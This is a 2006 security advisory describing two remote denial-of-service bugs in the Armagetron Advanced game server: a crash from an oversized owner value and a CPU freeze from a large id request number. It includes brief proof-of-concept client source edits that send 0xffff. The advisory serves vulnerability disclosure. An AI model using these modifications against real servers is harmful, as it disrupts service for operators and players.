####################################################################### Luigi Auriemma Application: Armagetron Advanced http://armagetronad.net Versions: <= 2.8.2 and current SVN Platforms: Windows, *nix, *BSD, Mac and more Bugs: A] crash through an invalid owner value B] freeze through invalid num in id_req_handler Exploitation: remote, versus server Date: 16 Jul 2006 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Armagetron Advanced is a well known action game inspired to the famous Tron movie. ####################################################################### ======= 2) Bugs ======= --------------------------------------- A] crash through an invalid owner value --------------------------------------- A program's termination or a crash happen when a client sends an owner value major than MAXCLIENTS+1. The function which reads this value is the following located in network/nNetObject.cpp: nNetObject::nNetObject(nMessage &m):lastSyncID_(m.MessageIDBig()),refCtr_(0) If the value is not excessively big the server terminates with the following message: Internal Error: Internal error in static nMachine& nMachine::GetMachine (short unsigned int) in network/nNetwork.cpp:3820 : Assertion userID <= MAXCLIENTS+1 failed ----------------------------------------------- B] freeze through invalid num in id_req_handler ----------------------------------------------- A client can freeze the server using a big num value (like 0x7fff or 0xffff) in the id_req_handler function used by the server in network/nNetObject.cpp. The server will be and will remain freezed with CPU at 100%. ####################################################################### =========== 3) The Code =========== A] add a customized owner value in WriteCreate in network/nNetObject.cpp: void nNetObject::WriteCreate(nMessage &m){ m.Write(id); // m.Write(owner); m.Write(0xffff); B] add a customized value in first_fill_ids in network/nNetObject.cpp: tJUST_CONTROLLED_PTR< nMessage > m = new nMessage(id_req); // m->Write(ID_PREFETCH - 10); m->Write(0xffff); ####################################################################### ====== 4) Fix ====== A patched version will be released soon. #######################################################################